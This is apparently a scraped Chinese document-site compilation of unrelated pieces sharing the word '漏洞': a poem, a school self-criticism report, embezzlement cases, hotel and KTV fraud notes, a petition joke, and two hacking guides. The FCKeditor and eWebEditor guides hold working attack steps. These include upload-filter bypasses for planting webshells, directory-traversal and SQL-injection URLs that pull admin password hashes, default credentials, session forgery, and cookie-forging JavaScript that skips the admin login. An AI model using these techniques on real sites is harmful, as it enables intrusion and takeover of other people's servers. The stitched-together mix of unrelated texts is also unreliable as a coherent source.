推荐第1篇:漏洞现代诗歌
闪电把漆黑的天幕
撕开一条漏洞
瞬间照亮了前方的路
雷响了,雨来了
淹没了蝉鸣,蛙声
我仍然站在暴雨中
是期待还是等待
没有什么目标
只有让闪电照耀
让暴雨洗涤沾满身驱的污垢
和疲惫不堪的肢体
我也记不清闪电划过多少次
雷声响过多少回
就好象数不清这生
有多少个漏洞
又失去多少个
可以拥有的机遇
上千个电话号码
有几个在你危难时
可以伸手相助
多少人鞍前马后
有几个能和你走到最后
春暖花开还诉说着情深似海
冬天一到便无影无踪
也许上苍给予这些眷顾
是你生命中注定的磨难
只能在这时才清醒
被雨浇透的轻松
总是在纠结过去了的往事
一个丢失
就成为一个漏洞
一个失败
就铸成终身憾事
用时间填补那些漏洞
用生命去等待
另一道闪电
照亮百孔千疮的灵魂
这时才感到命运中的顽强
是弥补这些漏洞的良药
在暴风雨中冲刷
在等待中找准方向
迎接一个崭新的未来
推荐第2篇:工作上的漏洞
一、工作上的漏洞
(一) 具体体现:
1、学习不够,没有把科学发展观理论与学校教育教学紧密结合。在运用科学发展理论来指导教育教学时,眼光过度关注学校发展,忽视了科学发展理论对学校问题的普遍指导意义,尤其忽视了对于学校细节管理的指导意义。对于新课标学习、高考精细化研究及重点问题突破集中时间不足,精力不够,成果不显著。
2、一些领导在青年教师面前以“我过的桥比你走的路还多”的姿态来提意见、做决策,在学校管理工作中以老眼光看待新问题,凭老经验办事情,而不考虑实际情况,不根据时事变化相应的做出科学决策,导致有的决策不合时宜。
3、倾听群众呼声的意识不强。对于群众的智慧,发挥使用不够。尤其对教研组长和班主任,会上对他们指导多,提出的要求多,会下交流少,倾听他们的建议少,而组长与班主任,倾听一线教师呼声的意识也不强,这在一定程度上影响了学校管理工作的针对性。
(二)根源剖析
1、思想上认识不到位,总是以工作忙为借口忽略学习新观点、新方法、新思路的重要性,一直认为以前的东西肯定不过时,不退伍,忽略时代发展的需要。
2、虽然一些领导极力去靠近一线教师的工作和生活,但由于日久积累下的上下级观念,导致一些意见和建议泛泛而谈,无关痛痒,使得一些改革上出成效,但不显著。
3、学校的成绩逐年攀升,使得一些领导和教师沉浸在喜悦当中无法自拔,认为之前所有的做法都是正确的,忘记了时代的变化和发展,缺少发展眼光。
(三)整改措施
1、潜下心来,深入学习科学发展理论,学习先进的教学教学理论;主动走出去,寻找先进学校与我校教育教学的契合点,解决好制约学校发展的症结;融入教职工中,倾听群众的呼声,掌握第一手资料,使学校管理思路更加清晰,制度更加完善,方法更加科学。
2、重视“以老带新”,也不能忽视“以新促老”,在以后的工作中,应该注重新老教师互动,不仅有和谐,也应该有竞争,让一些老领导和老教师在新教师的促动下与时俱进。
3、虽有“校长助理”制度,但不能光为校长提意见,也应该为副校长及其他中层领导提一些措施,让一些行为见一见阳光,让一些措施出来晒一晒太阳。
二、制度上的缺失
(一)具体体现:
1、班主任制度某些方面的不合理性使得许多教师不愿意做班主任,由此导致一些有能力的教师“退避三舍”,不能够人尽其才,造成人才资源的浪费和损失。
2、在对待临时工方面,单纯的将学校和临时工看作是雇佣与被雇佣的关系,使好多的临时工没有归宿感,同时,从县政府到学校,在政策上没有为临时工做出保障,使得许多临时工“身在曹营心在汉”,工作效率上也大打折扣。
3、由于权利过于集中,形成“领导说你行,你就行,不行也行;领导说你不行,你就不行,行也不行”的局面,为此,本来是教育上的一些精英和骨干,因为“不识时务”、“不懂领导的心”,成为“刺头”、“异类”。
(二)根源剖析
1、当一个班交给一位班主任手中时,那么无论这个班里发生的任何事情都是班主任一个人的事,即使任课老师所代的成绩不理想,也都归咎于班主任一个人身上,“起的比鸡早,睡的比狗晚”,付出的多,但有时收获却很少很少。
2、出于对财政方面的考虑,不能过多考虑临时工的待遇问题。另一方面,临时工可以召之即来,挥之即去,不用去长久考虑。
3、长久以来,人们心中存在的上下级观念,导致一些领导利用手中的权利,或牟取私利,或公报私仇,或满足其虚荣心。造成这种现象不仅有领导的原因,但是也不能忽略使这种现象“开花结果”的群众“沃土”。
(三)整改措施
1、在分工上,班主任不“一肩挑”,在制度上约束一些代课教师的职责,同时,利用好新出台的 “设立副班主任”制度,不能只是挂职,而没有作用。最后,考虑在班主任待遇上,多在政策和补贴上予以倾斜。
2、在制度上,给临时工一些政策支持,对于不同工龄和工种的临时工,分别对待,同时,建立考查机制和评价机制,多给这些同志步入“正式工”行列的机会。
3、让权利在阳光下行使,不搞一权独大,在制度上,要建立有效的监督机制,把权利关在制度的牢笼里。
三、政令不畅打折扣
(一)具体体现
1、在制定决策上,出现“朝令夕改”的现象,今天一个样,明天又换成另一个样,今天一个主意,明天又是另一个方案,政策缺乏延续性。
2、利于自己的政策就大肆的宣传执行,不利于自己的政策就千方百计的隐瞒封杀,导致上级的政令不能贯彻。
3、一些决策者把上级的规定命令指示当成传话筒,上级怎么说的原封不动的传给下级,不调查不摸底,不是吃透上情了解下情,而是下一通命令指示像传话筒一样使落实者知其然,不知其所以然。
(二)根源剖析
1、由于一些领导的能力和水平限制,在制定决策时出现缺乏主见的现象,今天有人提出意见,觉得有道理,明天又有人提出新主张,感觉也不错,这样跟着他人思维走。
2、这是一种典型的“地方保护主义”,凡事不从大局着眼,而是从自己的利益出发,过分追求自己的教学成绩,而不管学校发展的大局。
3、好多同志本着“明哲保身”的原则,只是机械化的执行决策,缺少独立思考和结合实际的能力。
(三)整改措施
1、制定决策时,听取他人的合理化意见和建议的同时,也不能奢望别人能为自己提供“包治百病”的“万金油”。对于他人的经验,不能盲目照搬照抄,应该合理取舍,大胆超越。
2、在制度上约束这种“我行我素”中透着些自私的行为,在评价成绩时,不仅看其结果如何漂亮,还要看其在过程中所带来的影响。
3、加强学习,让这些“传话筒”能够清醒的理解每一项政策的重要性和实施的必要性。建立和健全完整的评价机制,防止这类思想的蔓延。
四、工作疲沓不作为
(一)具体表现
1、有些领导在针对自己部门作出的决定,只是说说,走过场,具体如何落实,却没有了下文,本来一个很好的决策,却因为实施不力,没有结果了。
2、在学习怀仁以及山东一些教育先进校的时候,照搬照抄,不考虑自己学校和学生的实际情况,盲目作为。
3、在解决教师们生活中的实际问题时,总是以各种政策和实际困难搪塞,如学校书店的管理问题,幼儿园家长车辆乱停乱放,横冲直撞的问题等。
(二)根源剖析
1、缺乏开拓创新的精神,固步自封;怕承担风险,干脆不作为,话说的漂亮,做事却畏手畏脚,前怕狼,后怕虎。
2、为了迎合领导喜好,盲目照搬照抄,不管实际情况,认为只要学习了,领导就会开心,就会不找麻烦,自己就会成为落实有力的典型。
3、责任心不强,本着“事不关己,高高挂起”的原则,不涉及到自身利益,绝对不会去触碰,忘记自己身在领导岗位。
(三)整改措施
1、以刚性的约束机制真正形成“能者上、庸者下”的选人用人机制
2、加强勤政文化建设,使“无须扬鞭自奋蹄”蔚然成风。
3、要走进教室和学生的学习生活中去,拉近与他们的距离,领导不能只会高高在上,也要低头聆听民意民情。
高二年级杨海娥
推荐第3篇:内控漏洞案例
不相容职务不分离案例
案例一
2004年10月19号,北京市中级人民法院开庭审理原国家自然科学基金委员会资金管理处会计卞中涉嫌贪污挪用公款2.2亿元的巨额资金一案,卞中被判死缓。这也是北京市建国以来涉案金额最高的一起职务侵占案件。
卞中在1995年到2003年长达8年的时间里,贪污挪用公款
2.2亿元。其中的一个手段就是做假的银行对账单。
作为入账凭证,每一笔资金的流向都体现在银行的对账单上,而在国家自然科学基金委员会资金管理处,卞中既管记账又管拨款,既是会计又是出纳,这样就给他实施贪污挪用提供了职务上的便利。
而除了做假账,还有一个很重要的原因,那就是卞中能够控制的资金实在是太多了。这个基金委它负责全国所有科研项目资金的资助,所以它的金额非常大。自然科学基金每年拨款规模高达20多亿元,但实际控制这笔巨额基金流向的却只有财务局下属资金管理处的三名财务人员。卞中实际上不仅仅只负责登记账目,他还包揽了整个自然科学基金的拨款工作,就连财务局局长的人名章和支票他也可以很轻易地拿到,这样的职权早就超越了一名会计应有的权限。
案例二
“全国电子工业系统劳模”、“桂林市劳模”、“桂林市优秀厂长(经理)”、“杰出青年企业家”,这许多的光环一度使曾庆坚成了广西桂林市企业界风光一时的人物,也使他在长达8年的时间里,稳坐在桂林市无线电二厂厂长和党委书记的位置上。
然而,2005年8月12日,桂林市中级人民法院举行宣判会,宣判曾庆坚利用职务之便,采取重复报账、虚假报账的方式,贪污所在企业公款共计人民币76万元,贪污数额大,并且拒不退赃,犯罪情节严重,应酌情从重处罚,判处曾庆坚无期徒刑,剥夺政治权利终身,并处没收个人财产人民币20万元,追缴违法所得赃款人民币76万元,上缴国库。桂林市中级人民法院一纸因贪污罪而判无期徒刑的判决书,让曾庆坚曾经拥有的光环支离破碎,从一名“优秀厂长”沦为阶下囚。
分析曾庆坚犯罪的主要原因是:在原材料采购管理上,大宗材料采购权全由曾庆坚一人包办,购销合同签订权、付款权以及原材料价格制订权也全由他一人掌管;曾庆坚一人独揽了所有原材料价格确定权、采购和付款等业务,企业的财务管理制度形同虚设,企业的账户就相当于曾庆坚的“私人金库”,他可以随意调动任何数额资金。
挪用3.96亿公款
中华全国供销总社原处长获刑10年
中华全国供销总社预算处原处长刘林祥,采用借款不记账、伪造银行对账单、资金报表方式作案,挪用3.96亿元公款,近日终审被北京市高级人民法院判处10年有期徒刑。
对账单遭疑后处长“自首”
案发前,刘林祥担任中华全国供销总社财务部预算处处长,负责管理财务部的预算处、财务处和结算中心的全面工作。2004年9月,财务部内部调整,刘林祥拒绝将近几年来单位与银行往来的对账单拿给领导李某过目。
在得知李某准备到银行亲自查账后,2004年9月14日刘林祥找到李某,交代了自己在过去三年间的犯罪事实。
法院审理查明,2001年12月到2004年7月间,刘林祥利用职务便利,私自以中华全国供销总社结算中心的名义,与梁某负责的北京丰银企业集团签订借款协议书,采取不记账和伪造银行对账单、资金报表等手段,先后将其管理的公款共3.96亿余元借给该集团及其关联企业用于经营。
借款3亿多不设还款时间
刘林祥称,最初他通过一位老领导结识了正在帮银行拉贷款的梁某,为了帮忙就存了2000万元在某银行账户。
此后,两人私下有了更多接触。由于梁某有多家关联企业投
资经营酒店和房地产,于是提出以其投资的金玉大厦作价6亿元作为抵押,向刘林祥借款3亿元。
考虑到能为单位创收、体现自己的能力,刘林祥陆续将涉案的3亿多元借给了梁某,但在借款合同上,没有约定借款的限额和还款时间。
贷款人不知情不担刑责
向领导坦白了全部借款情节后,单位查账发现梁某尚欠2亿多元。随后找到梁某,补齐了全部借款手续,并于2007年8月最终将钱陆续追回,本金和利息合计约4.27亿元。
2010年9月20日,市一中院作出一审判决,刘林祥因犯挪用公款罪,被判处有期徒刑10刘林祥不服判决,提起上诉。近日,市高院作出裁定,驳回刘林祥的诉讼请求,维持原判。
检方介绍,案件调查期间,梁某表示因当时的借款协议落款是供销总社,以为刘林祥上级同意了借钱一事。调查证实,没有任何证据表明梁某跟刘林祥合谋挪用公款,因此无需承担任何刑事责任。
设审计局独立定期查账
刘林祥曾称,领导一般只查部门的大账,虽然也曾检查与银行资金往来的对账单,但他伪造的假对账单也都能敷衍过去。对此,中华全国供销总社监察局案件审理室人士表示,此案暴露了总社内控制度的疏漏,总社也设立了独立的审计局,将其从此前的财务部门剥离,每年定期对账目进行内部审计。
推荐第4篇:杭州酒店财务管理漏洞
杭州酒店财务管理漏洞
2005年5月,杭州市中心某著名酒店一名主管偶然发现:前几天来住宿的一个外国客人离店了,服务员却称还没走。经查实,外国客人曾住过的房间住进了另外一张面孔,结账报表上却只登记了一笔住宿费。
一般,客人入住酒店时,接待员负责把客人资料输入电脑,谈价格;登记处则负责交押金和结账。由于旅游分淡旺季,酒店房价也会相应的所适当浮动,酒店每天都会根据人流量适当对房价作调整,向服务员公布一个最低限价。等顾客结账离开后,服务员们便开始出手了:更改客人资料(比如把谈好的350元房价改成低限价),从而把中间的差价,神不知鬼不觉地揣入自己腰包。
目前,绝大多数酒店都江堰市有一条行规:不管顾客什么时候下榻,结账时间都统一在中午12点。一些顾客没到12点就结账离店,利用这个空当,服务员让其他客人入住,收取的第二笔客房费自然又被瓜分了。
另外,一些住宿旅客为报销方便,往往要求多开发票金额,自己承担税款,这笔税款也落入服务员口袋。旺季时,一天下来,女孩们可私分掉5000多元。 酒店现正使用的软件系统存在缺陷,没有设置权限管理,任何人都可以随意进入系统,更改资料。而这套软件系统,在杭城酒店广泛使用。另外,财务管理上有疏忽。
由于酒店每天都有营业日报表,她们每天在日报表上做好手脚再交给财务。酒店现在开具的发票都是电脑流动打印的,就像出租汽车上的一样,一般不会一笔笔繁琐地核对。财务人员只核对已被她们更改过的日报表,从没觉察到其中已流失了100多万元。
推荐第5篇:Fckeditor漏洞利用总结
Fckeditor漏洞利用总结
查看编辑器版本
FCKeditor/_whatsnew.html
—————————————————————————————————————————————————————————————
2.Version 2.2 版本
Apache+linux 环境下在上传文件后面加个.突破!测试通过。
—————————————————————————————————————————————————————————————
3.Version
action=\"http://www.daodoc.com/
FCKeditor/editor/filemanager/upload/test.html
FCKeditor/editor/filemanager/connectors/test.html
FCKeditor/editor/filemanager/connectors/uploadtest.html
—————————————————————————————————————————————————————————————
7.常用上传地址
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.daodoc.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)
JSp 版:
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文
件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址。
—————————————————————————————————————————————————————————————
8.其他上传地址
FCKeditor/_samples/default.html
FCKeditor/_samples/asp/sample01.asp
FCKeditor/_samples/asp/sample02.asp
FCKeditor/_samples/asp/sample03.asp
FCKeditor/_samples/asp/sample04.asp
一般很多站点都已删除_samples 目录,可以试试。
FCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。
—————————————————————————————————————————————————————————————
9.列目录漏洞也可助找上传地址
Version 2.4.1 测试通过
修改CurrentFolder 参数使用 ../../来进入不同的目录
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp
根据返回的XML 信息可以查看网站所有的目录。
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
也可以直接浏览盘符:
JSp 版本:
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F
—————————————————————————————————————————————————————————————
10.爆路径漏洞
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp
—————————————————————————————————————————————————————————————
11.FCKeditor 被动限制策略所导致的过滤不严问题
影响版本: FCKeditor x.x
3脆弱描述:
FCKeditor v2.4.3 中File 类别默认拒绝上传类型:
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htacce|asis|sh|shtml|shtm|phtm
Fckeditor 2.0
2、php
4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilepath = $sServerDir .$sFileName,而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!
而在apache 下,因为\"Apache 文件名解析缺陷漏洞\"也可以利用之,另建议其他上传漏洞中定义TYpE 变量时使用File 类别来上传文件,根据FCKeditor 的代码,其限制最为狭隘。
在上传时遇见可直接上传脚本文件固然很好,但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过,也可以利用2003 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg!
—————————————————————————————————————————————————————————————
12.最古老的漏洞,Type文件没有限制!
我接触到的第一个fckeditor漏洞了。版本不详,应该很古老了,因为程序对type=xxx 的类型没有检查。我们可以直接构造上传把type=Image 改成Type=hsren 这样就可以建立一个叫hsren的文件夹,一个新类型,没有任何限制,可以上传任意脚本!
—————————————————————————————————————————————————————————————
以上方法都是网上收集和在平时渗透中所总结的经验,可能有些有遗漏,当再想起的时候再补充,也有自己没发现的就要靠各位大侠分享学习了!
推荐第6篇:KTV常见的漏洞
KTV常见的漏洞
A、采购、经理、会计拿供货商回扣。
B、服务员与吧员、收银员勾结私卖、私送茶水、水果拼盘、吧台存酒。
C、服务员兜里装着烟、口香糖卖给客人。
D、保洁、服务员把客人剩下的食品、饮料、酒带走或吃喝掉。 E、下午、夜场前台收银、服务生为熟人延时,已经走的房间不关台为熟人留下。房间消费不安规定,拿其他房间消费单顶替。 F、免费唱券、会员卡等管理不规范私扣或误发对象。 G、服务员没有有效的传达公司活动信息,造成客人流失。 H、捡到客人物品不及时上缴,心存侥幸。
I、把公司赠送客人酒水、客人遗留的酒水变卖或据为己有(存酒票)。 J、客人自带酒水没能及时阻止。 K、保安不查包,造成公司物品流失。 L、值班人员, 仓管员偷公司无量物品。
M、股东自己采购、做酒水供应或索要进场物品、进场好处费不上缴据为己有。
推荐第7篇:KTV前台收银漏洞
KTV前台收银漏洞
2009-01-14 16:46:14 来源: 作者:不想 【大 中 小】 浏览:8816
次 评论:0条
修改房价
1.关注每天前台报表中的修改房价/换房报告,对一些修改房价频率较高的操作员所经手
房间看是否手续齐全。
2.客人结帐的帐单必须要有客人签字确认,并看打印帐单的时间与电脑系统中客人结帐时间是否相差很大,要是时间相差很大应该查明原因。
扣减
1.涉及金额变化的必须做扣减,扣减必须经过相关人员(店长等)签字。
2.为便于财务审帐能更清楚的明白扣减缘由,建议做扣减先到财务审批后,再由店长签字。
待结
1.客人逃帐,待结金额为正,前台为了逃避责任,通过降低房价等,将金额转到住店客人名下。
2.有些客人挂帐时间比较久,前台服务员把挂帐的余额转到住店客人名下。
发票
防范方法:看退房时间与卡发票的顺序。比方说客人是10点退的房,而订在帐单后的记帐联却比11点退房客人的发票号码还要靠后,而且这种现象还很频繁,那么这里面就可能会有问题。
房态
客房与前台相互作弊,把干净房设置为脏房,然后将其出售;将实际已退的未到退房时间的房间,电脑里不做退房处理,再将其出售。
防范方法:财务应不定期抽查房态。
推荐第8篇:信访制度的漏洞
信访制度的漏洞
老农的女儿被村长霸占后...老农想:找乡长、说不定和村长有勾结;找县长、说不定和乡长有勾结;于是找到市长反映。市长说现在规定你不能越级,你去找县长,县长说你不能越级,去找乡长,乡长说你不能越级,去找村长。村长给老农两耳光:滚回去,有本事你去上访啊。
推荐第9篇:ewebeditor漏洞利用总结
ewebeditor漏洞利用总结
先从最基本的记录起!通常入侵ewebeditor编辑器的步骤如下:
1、首先访问默认管理页看是否存在。
默认管理页地址2.80以前为 ewebeditor/admin_login.asp 以后版本为admin/login.asp (各种语言的大家自己改后缀,本文就以asp来进行说明,下面不再细说了!)
2、默认管理帐号密码!
默认管理页存在!我们就用帐号密码登陆!默认帐号密码为: admin admin888 !常用的密码还有admin admin999 admin1 admin000 之类的。
3、默认数据库地址。
如果密码不是默认的。我们就访问是不是默认数据库!尝试下载数据库得到管理员密码!管理员的帐号密码,都在eWebEditor_System表段里,sys_UserName Sys_Userpa 都是md5加密的。得到了加密密码。可以去www.daodoc.com 等网站进行查询!暴力这活好久不干了!也可以丢国外一些可以跑密码的网站去跑!
默认数据库路径为: ewebeditor/db/ewebeditor.mdb 常用数据库路径为:ewebeditor/db/ewebeditor.asa ewebeditor/db/ewebeditor.asp ewebeditor/db/#ewebeditor.asa ewebeditor/db/#ewebeditor.mdb ewebeditor/db/!@#ewebeditor.asp ewebeditor/db/ewebeditor1033.mdb 等
很多管理员常改.asp后缀,一般访问.asp .asa 后缀的 都是乱码!可以用下载工具下载下来,然后更改后缀为.mdb 来查看内容!
4、说说漏洞基本利用步骤,还以asp为例!
登陆后台以后。选择样式管理,默认编辑器的默认样式都不可以修改的。我们可以从任意样式新建一个样式,然后在图片上传添加可上传后缀。.asa .cer .cdx 等!.asp 过滤过了。但是我们可以用.asaspp 后缀来添加,这样上传文件正好被ewebeditor 吃掉asp后缀,剩下.asp 呵呵!代码不详细说了。总之是个很可笑的过滤!同样,如果遇到一个管理员有安全意识的,从代码里,把.asp .asa .cer .cdx 都完全禁止了,我们也可以用.asasaa 后缀来突破。添加完了后缀,可以在样式管理,点击预览,然后上传!
5、默认管理页不存在!
在实际入侵过程中,有很多默认的管理页不存在的时候。我们可以直接访问样式管理页面 ewebeditor/admin_style.asp 然后用第4步的方式拿webshell。如果样式管理页也不存在的话,我们可以看数据库内的样式表(ewebeditor_style)里面有没有比我们先进去的朋友留下的样式。然后构造上传!具体url如下: eWebEditor/ewebeditor.asp?id=content&style=www 红色部分是我们发现被修改添加了asa后缀的样式名,大家自行修改!
6、ewebeditor的几个版本存在注入!
ewebeditor 以前版本都存在注入 ewebeditor/ewebeditor.asp?id=article_content&style=Full_v200 !
添加验证字符串,和管理员字段可以跑出管理员的md5加密密码!
ewebeditor v2.1.6存在注入,可以用union select 添加上传后缀进行上传!先贴漏洞利用方式!
-----------------
ewebeditor asp版 2.1.6 上传漏洞利用程序----
-----------------
以上代码令存为html!修改红色部分的路径,然后自动上传 .cer 文件!漏洞原因是因为sStyleName变量直接从style中读取,并没有过滤,所以可以包含任意字符!用select在ewebeditor_style表中查找s_name为sStyleName的记录,找不到就提示出错!在sStyleName变量中用union来构造记录,我们可以在sAllowExt中加入\"|cer\"、\"|asa\"等!
另外还有一些版本的ewebeditor的upload.asp文件存在注入漏洞!贴几个注入用的url!信息错误则返回脚本出错的提示,在浏览器左下角!具体利用如下:
ewebeditor/Upload.asp?type=FILE&style=standard_coolblue1\'and%20(select%20top%201%20asc(mid(sys_userpa,15,1))%20from%20ewebeditor_system%20)>98%20and%20\'1\'=\'1
注意修改红色部分的字段名、位数、ascii码的值!
7、目录遍历漏洞!
这里大概说一下!目录遍历漏洞基本存在于ewebeditor/admin_uploadfile.asp 高版本的是ewebeditor/admin/upload.asp 文件!这个文件有的不需要登陆验证,有些需要!很多有经验的管理员会把编辑器的目录设置为只读权限,不可修改!这种情况下,唯一可以利用的也就是利用遍历目录功能查看网站文件,比如数据库路径、后台地址、其他的上传地址、最直观的就是别人留下的小马等等!这些都自由发挥了!说下漏洞利用方法!
漏洞利用方式如下:在上传文件管理页面 随便选择一个上传样式!比如ewebeditor/admin_uploadfile.asp?id=14 在id后面添加&dir=../..
类似如下:webeditor/admin_uploadfile.asp?id=14&dir=../../../../data/ 可以看到网站数据库的路径!
另外一个遍历目录的漏洞文件是 ewebeditor/asp/browse.asp
漏洞代码为 :
Function GetList()
Dim s_List, s_Url
s_List = \"\"
Dim oFSO, oUploadFolder, oUploadFiles, oUploadFile, sFileName
\'Response.Write sCurrDir
\'On Error Resume Next
Set oFSO = Server.CreateObject(\"Scripting.FileSystemObject\")
Set oUploadFolder = oFSO.GetFolder(Server.Mappath(sCurrDir))
\'注意一下sCurrDir变量,这个值等下我们可以用到
If Err.Number>0 Then
s_List = \"\"
Exit Function
End If
If sDir \"\" Then
If InstrRev(sDir, \"/\") >1 Then
s_Url= Left(sDir, InstrRev(sDir, \"/\") - 1)
Else
s_Url = \"\"
End If
s_List = s_List & \"\" & _
\"\" & _
\"..\" & _
\" \" & _
\"\"
End If
\'Response.Write sDir&\"!\"&s_List
Dim oSubFolder
For Each oSubFolder In oUploadFolder.SubFolders
\'Response.Write oUploadFolder.SubFolders
If sDir = \"\" Then
s_Url = oSubFolder.Name
Else
s_Url = sDir & \"/\" & oSubFolder.Name
End If
s_List = s_List & \"\" & _
\"\" & _
\"\" & oSubFolder.Name & \"\" & _
\" \" & _
\"\"
Next
\'Response.Write s_List
Set oUploadFiles = oUploadFolder.Files
For Each oUploadFile In oUploadFiles
\'Response.Write oUploadFile.Name
sFileName = oUploadFile.Name
If CheckValidExt(sFileName) = True Then
\'这行让人有点郁闷,检测了所有允许的文件后缀,如不允许就无法列出,不然就不只列出目录名和图片文件了
If sDir = \"\" Then
s_Url = sContentpath & sFileName
Else
s_Url = sContentpath & sDir & \"/\" & sFileName
End If
s_List = s_List & \"\" & _
\"\" & FileName2pic(sFileName) & \"\" & _
\"\" & sFileName & \"\" & _
\"\" & GetSizeUnit(oUploadFile.size) & \"\" & _
\"\"
End If
Next
Set oUploadFolder = Nothing
Set oUploadFiles = Nothing
\'Response.Write Server.HTMLEncode(s_List)&\"!\"&s_Url
If sDir = \"\" Then
s_Url = \"\"
\'s_Url = \"/\"
Else
s_Url = \"/\" & sDir & \"\"
\'s_Url = \"/\" & sDir & \"/\"
End If
s_List = s_List & \"\"
s_List = HTML2JS(s_List)
\'Response.Write Server.HTMLEncode(s_List)&\"!\"&s_Url
s_List = \"parent.setDirList(\"\"\" & s_List & \"\"\", \"\"\" & s_Url & \"\"\")\"
GetList = s_List
End Function
\'如果没有下面这步检测的话,应该就可以列出目录中所有的文件了,有点郁闷..现在只能列出允许后缀的文件和目录名
Function CheckValidExt(s_FileName)
If sAllowExt = \"\" Then
CheckValidExt = True
Exit Function
End If
Dim i, aExt, sExt
sExt = LCase(Mid(s_FileName, InStrRev(s_FileName, \".\") + 1))
CheckValidExt = False
aExt = Split(LCase(sAllowExt), \"|\")
For i = 0 To UBound(aExt)
If aExt(i) = sExt Then
CheckValidExt = True
Exit Function
End If
Next
End Function
\'我们顺着代码往下找,发现sCurrDir的值是通过下面的值得到的
Sub Initparam()
sType = UCase(Trim(Request.QueryString(\"type\")))
sStyleName = Trim(Request.QueryString(\"style\"))
Dim i, aStyleConfig, bValidStyle
bValidStyle = False
For i = 1 To Ubound(aStyle)
aStyleConfig = Split(aStyle(i), \"|||\")
If Lcase(sStyleName) = Lcase(aStyleConfig(0)) Then
bValidStyle = True
Exit For
End If
Next
If bValidStyle = False Then
OutScript(\"alert(\'Invalid Style.\')\")
End If
sBaseUrl = aStyleConfig(19)
\'nAllowBrowse = CLng(aStyleConfig(43))
nAllowBrowse =
1If nAllowBrowse 1 Then
OutScript(\"alert(\'Do not allow browse!\')\")
End If
sUploadDir = aStyleConfig(3)
If Left(sUploadDir, 1) \"/\" Then
Select Case sType
Case \"REMOTE\"
sUploadDir = \"../../\" & sUploadDir & \"Image/\"
Case \"FILE\"
sUploadDir = \"../../\" & sUploadDir & \"Other/\"
Case \"MEDIA\"
sUploadDir = \"../../\" & sUploadDir & \"Media/\"
Case \"FLASH\"
sUploadDir = \"../../\" & sUploadDir & \"Flash/\"
Case Else
sUploadDir = \"../../\" & sUploadDir & \"Image/\"
End Select
End If
\'sUploadDir =sUploadDir &\"/\"
Select Case sBaseUrl
Case \"0\"
\'sContentpath = aStyleConfig(23)
Select Case sType
Case \"REMOTE\"
sContentpath = \"../\" & aStyleConfig(3) & \"Image/\"
Case \"FILE\"
sContentpath = \"../\" & aStyleConfig(3) & \"Other/\"
Case \"MEDIA\"
sContentpath = \"../\" & aStyleConfig(3) & \"Media/\"
Case \"FLASH\"
sContentpath = \"../\" & aStyleConfig(3) & \"Flash/\"
Case Else
sContentpath = \"../\" & aStyleConfig(3) & \"Image/\"
End Select
Case \"1\"
sContentpath = Relativepath2Rootpath(sUploadDir)
Case \"2\"
sContentpath = Rootpath2Domainpath(Relativepath2Rootpath(sUploadDir))
End Select
Select Case sType
Case \"REMOTE\"
sAllowExt = aStyleConfig(10)
Case \"FILE\"
sAllowExt = aStyleConfig(6)
Case \"MEDIA\"
sAllowExt = aStyleConfig(9)
Case \"FLASH\"
sAllowExt = aStyleConfig(7)
Case Else
sAllowExt = aStyleConfig(8)
End Select
sCurrDir = sUploadDir \'注意这里,这个是得到了配置的路径地址
sDir = Trim(Request(\"dir\")) \'得到dir变量
sDir = Replace(sDir, \"\\\", \"/\") \'对dir变量进行过滤
sDir = Replace(sDir, \"../\", \"\")
sDir = Replace(sDir, \"./\", \"\")
If sDir \"\" Then
If CheckValidDir(Server.Mappath(sUploadDir & sDir)) = True Then
sCurrDir = sUploadDir & sDir & \"/\"
\'重点就在这里了,看到没有,当sUploadDir & sDir存在的时候,sCurrDir就为sUploadDir & sDir的值了
\'虽然上面对sDir进行了过滤,不过我们完全可以跳过.具体利用下面的利用中给出
Else
sDir = \"\"
End If
End If
End Sub
利用方式如下:
http://site/ewebeditor/asp/browse.asp?style=standard650&dir=…././/…././/admin
这样子就可以看到admin的内容了。构造特殊的dir绕过上面的验证!页面空白的时候查看源代码,就可以看到目录列表了!
8、seion欺骗漏洞!
适用于一些设置不当的虚拟主机。当旁注得到一个webshell,而目标站存在ewebeditor却不能找到密码的时候可以尝试欺骗进入后台!顺序如下:
新建一个.asp文件,内容如下: <%Seion(\"eWebEditor_User\") = \"123132323\"%>然后访问这个文件,再访问ewebeditor/admin_default.asp !欺骗进入后台!不过很老了!
9、后台跳过认证漏洞!
访问后台登陆页面!随便输入帐号密码,返回错误!然后清空浏览器,在地址栏输入
javascript:alert(document.cookie=\"adminuser=\"+escape(\"admin\"));
javascript:alert(document.cookie=\"adminpa=\"+escape(\"admin\"));
javascript:alert(document.cookie=\"admindj=\"+escape(\"1\"));
然后再清空地址栏,在路径里输入后台登陆后的页面,比如: admin_default.asp admin/default.asp 等。直接进入后台,利用方式见上文!
10、利用远程上传功能!
